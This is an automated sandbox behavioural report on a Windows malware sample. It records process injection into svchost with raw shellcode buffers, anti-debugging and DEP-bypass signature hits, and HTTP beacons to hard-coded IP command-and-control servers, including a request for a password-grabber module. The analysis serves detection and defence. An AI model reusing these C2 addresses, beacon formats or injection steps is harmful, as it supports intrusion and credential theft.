RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
New_ntdll_RtlDispatchException+0xfa New_ntdll_RtlRemoveVectoredContinueHandler-0x8d @ 0x74e86d97
KiUserExceptionDispatcher+0x2e KiRaiseUserExceptionDispatcher-0x45 ntdll+0x51278 @ 0x77951278
RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a @ 0x77919a5a
RtlVirtualUnwind+0x37 RtlRestoreContext-0x19 kernel32+0x4b5e7 @ 0x7724b5e7
stacktrace+0x1d1 memdup-0x62 @ 0x74e705bd
hook_in_monitor+0x45 lde-0x133 @ 0x74e642ea
New_ntdll_NtAllocateVirtualMemory+0x34 New_ntdll_NtClose-0x162 @ 0x74e7fc86
VirtualAllocExNuma+0x66 VirtualAllocEx-0x2a kernelbase+0x33096 @ 0x7fefde63096
VirtualAllocEx+0x16 WriteProcessMemory-0x1a kernelbase+0x330d6 @ 0x7fefde630d6
VirtualAllocEx+0x11 VerLanguageNameW-0xf kernel32+0x4bbe1 @ 0x7724bbe1
0x9cf3d

exception.instruction_r: 48 8b 01 4a 89 44 c6 78 4d 85 e4 74 08 4b 89 8c
exception.symbol: RtlVirtualUnwind+0x14a RtlCheckForOrphanedCriticalSections-0x356 ntdll+0x19a5a
exception.instruction: mov rax, qword ptr [rcx]
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 105050
exception.address: 0x77919a5a
registers.r14: 855617600
registers.r15: 2350208
registers.rcx: 2470792156623991849
registers.rsi: 2349792
registers.r10: 0
registers.rbx: 3
registers.rsp: 2349400
registers.r11: 2470792156623991697
registers.r8: 3
registers.r9: 1961945856
registers.rdx: 3
registers.r12: 855443584
registers.rbp: 2470792156623991825
registers.rdi: 40
registers.rax: 4
registers.r13: 0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (7 events)

suspicious_features	Connection to IP address	suspicious_request	GET https://179.189.229.254/rob129/TEST22-PC_W617601.D4F77BDCB54FCB3B1B575C0A3B4827D7/5/file/
suspicious_features	Connection to IP address	suspicious_request	GET https://179.189.229.254/rob129/TEST22-PC_W617601.D4F77BDCB54FCB3B1B575C0A3B4827D7/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/MCxF3JrLYrtTCbjOSF8HBH79R/
suspicious_features	Connection to IP address	suspicious_request	GET https://179.189.229.254/rob129/TEST22-PC_W617601.D4F77BDCB54FCB3B1B575C0A3B4827D7/14/exc/E:%200xc0000005%20A:%200x0000000077919A5A/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://179.189.229.254/rob129/TEST22-PC_W617601.D4F77BDCB54FCB3B1B575C0A3B4827D7/14/user/test22/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://179.189.229.254/rob129/TEST22-PC_W617601.D4F77BDCB54FCB3B1B575C0A3B4827D7/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5CAnyLiteGamesSAOY%5Clinesloters.exe/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://179.189.229.254/rob129/TEST22-PC_W617601.D4F77BDCB54FCB3B1B575C0A3B4827D7/14/NAT%20status/client%20is%20behind%20NAT/0/
suspicious_features	Connection to IP address	suspicious_request	GET https://105.27.205.34/rob129/TEST22-PC_W617601.D4F77BDCB54FCB3B1B575C0A3B4827D7/5/pwgrabb64/

Performs some HTTP requests (8 events)

request	GET http://ipecho.net/plain
request	GET https://179.189.229.254/rob129/TEST22-PC_W617601.D4F77BDCB54FCB3B1B575C0A3B4827D7/5/file/
request	GET https://179.189.229.254/rob129/TEST22-PC_W617601.D4F77BDCB54FCB3B1B575C0A3B4827D7/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/MCxF3JrLYrtTCbjOSF8HBH79R/
request	GET https://179.189.229.254/rob129/TEST22-PC_W617601.D4F77BDCB54FCB3B1B575C0A3B4827D7/14/exc/E:%200xc0000005%20A:%200x0000000077919A5A/0/
request	GET https://179.189.229.254/rob129/TEST22-PC_W617601.D4F77BDCB54FCB3B1B575C0A3B4827D7/14/user/test22/0/
request	GET https://179.189.229.254/rob129/TEST22-PC_W617601.D4F77BDCB54FCB3B1B575C0A3B4827D7/14/path/C:%5CUsers%5Ctest22%5CAppData%5CRoaming%5CAnyLiteGamesSAOY%5Clinesloters.exe/0/
request	GET https://179.189.229.254/rob129/TEST22-PC_W617601.D4F77BDCB54FCB3B1B575C0A3B4827D7/14/NAT%20status/client%20is%20behind%20NAT/0/
request	GET https://105.27.205.34/rob129/TEST22-PC_W617601.D4F77BDCB54FCB3B1B575C0A3B4827D7/5/pwgrabb64/

Allocates read-write-execute memory (usually to unpack itself) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000290000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1	0	0

Looks up the external IP address (1 event)

domain

ipecho.net

Creates a suspicious process (1 event)

cmdline

C:\Windows\system32\svchost.exe

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 622592 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x0000000180001000 process_handle: 0x00000000000003f4	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 9, 2021, 9:53 a.m.	flags: 15 family: 0		111	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00050400', u'virtual_address': u'0x0000d000', u'entropy': 7.3471992121202385, u'name': u'.rsrc', u'virtual_size': u'0x00050390'}

entropy

7.34719921212

description

A section with a high entropy has been found

entropy

0.883081155433

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Sept. 9, 2021, 9:53 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Communicates with host for which no DNS query was performed (2 events)

host	105.27.205.34
host	179.189.229.254

Allocates execute permission to another process indicative of possible code injection (50 out of 267 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000110000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000120000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 790528 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000180000000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000480000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1
NtAllocateVirtualMemory Sept. 9, 2021, 9:53 a.m.	process_identifier: 1852 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000470000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000000000003f4	1

Potential code injection by writing to the memory of another process (50 out of 399 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: UAVVWSHì`Hl$`HäðHùë0H¨ÇGXHOÿW0HHWA¸ÿÿÿÿE3ÉÿWGXÈÁáÈL$\D$\øuQHw`HkF%HD$PHD$PH=(uVHFHLV@L^8H^0LN(LF HNHVHD$8LT$0L\$(H\$ ëjD$\ø"Å3Àé\ÿÿÿHD$PH=MuPHFPH^HLV@L^8Lv0LN(LF HNHVHD$@H\$8LT$0L\$(Lt$ ÿH ¸éóþÿÿH\|$PtHD$PHøouLF HNHVÿëÌÿëÈHD$PHø%uHNÿëµHD$PHøJGÿÿÿHNHVÿëHÇ¨HHWE3ÀE3ÉÿWHÿW(HOÿW(HÇGHÇ3ÉÿW83ÀHå[_^A^]ÃÌÌÌÌÌÌUVHì(Hl$ HäðHuPHöt@HEHM@LFxHVpÉHLH¶HHNÿV0HNºÿÿÿÿÿV He^]Ã base_address: 0x0000000000110000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: ,'w +"w/"w Ù wð@wÀ/w0ww base_address: 0x0000000000120000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: H¹H¸ÿà base_address: 0x00000000ff42246c process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: VERSION.dll base_address: 0x0000000000470000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: o!wG base_address: 0x0000000000480000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: ,'w +"w/"w Ù wð@wÀ/w0wwH base_address: 0x0000000000120000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: GetFileVersionInfoA base_address: 0x0000000000470000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: 6"wìüþG base_address: 0x0000000000480000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: ,'w +"w/"w Ù wð@wÀ/w0wwH base_address: 0x0000000000120000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: VerQueryValueA base_address: 0x0000000000470000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: 6"wìüþG base_address: 0x0000000000480000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
WriteProcessMemory Sept. 9, 2021, 9:53 a.m.	buffer: ,'w +"w/"w Ù wð@wÀ/w0wwH base_address: 0x0000000000120000 process_identifier: 1852 process_handle: 0x00000000000003f4	1	1
